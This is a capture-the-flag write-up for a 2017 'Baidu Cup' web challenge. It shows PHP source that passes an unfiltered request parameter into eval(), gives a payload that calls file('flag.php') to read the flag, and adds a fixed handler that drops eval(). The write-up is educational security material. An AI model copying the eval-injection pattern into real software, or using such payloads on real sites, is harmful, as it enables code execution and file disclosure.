The "Baidu Cup" CTF competition was held in February 2017, Web: explosion-2
2022-07-05 13:19:00 【Part 02】
Challenge description:
The flag is not in a variable.
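<?php
include "flag.php";
// Request value, taken unfiltered
$a = @$_REQUEST['hello'];
// The value is interpolated into the code string that eval() runs
eval( "var_dump($a);");
show_source(__FILE__);

Payload:
?hello=file('flag.php')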

The file() function can read flag.php directly.
file_get_contents() also works, but the result is only visible in the page source.
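
The root cause and its fix, as an added example that is not part of the original write-up or the challenge: the first function only builds the string that the challenge passes to eval(), and the second is a hardened handler that keeps the request value as data. The function names eval_source and dump_hello are hypothetical, and the request array is constructed sample input.

```php
<?php
declare(strict_types=1);

// Constructed sample input: the request value from the write-up.
$request = ['hello' => "file('flag.php')"];

// What the challenge hands to eval(): double-quoted interpolation splices the
// request value into the source text, so it is parsed as PHP, not as a string.
// This function only returns that text; it never evaluates it.
function eval_source(string $a): string
{
    return "var_dump($a);";
}

// Hardened handler (hypothetical name): the value stays data from start to end.
function dump_hello(array $request): string
{
    $a = $request['hello'] ?? '';
    if (!is_string($a)) {
        // ?hello[]=x arrives as an array; treat anything but a string as empty.
        $a = '';
    }

    ob_start();
    var_dump($a);                 // no eval(), so nothing in $a is ever parsed
    $out = (string) ob_get_clean();

    // The dump is written into an HTML page, so encode it for that context.
    return htmlspecialchars($out, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

echo "eval() would run: ", eval_source($request['hello']), PHP_EOL;
echo "hardened output:  ", dump_hello($request);
```

With the hardened handler the payload is dumped as a 16-character string instead of being executed as a call to file().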
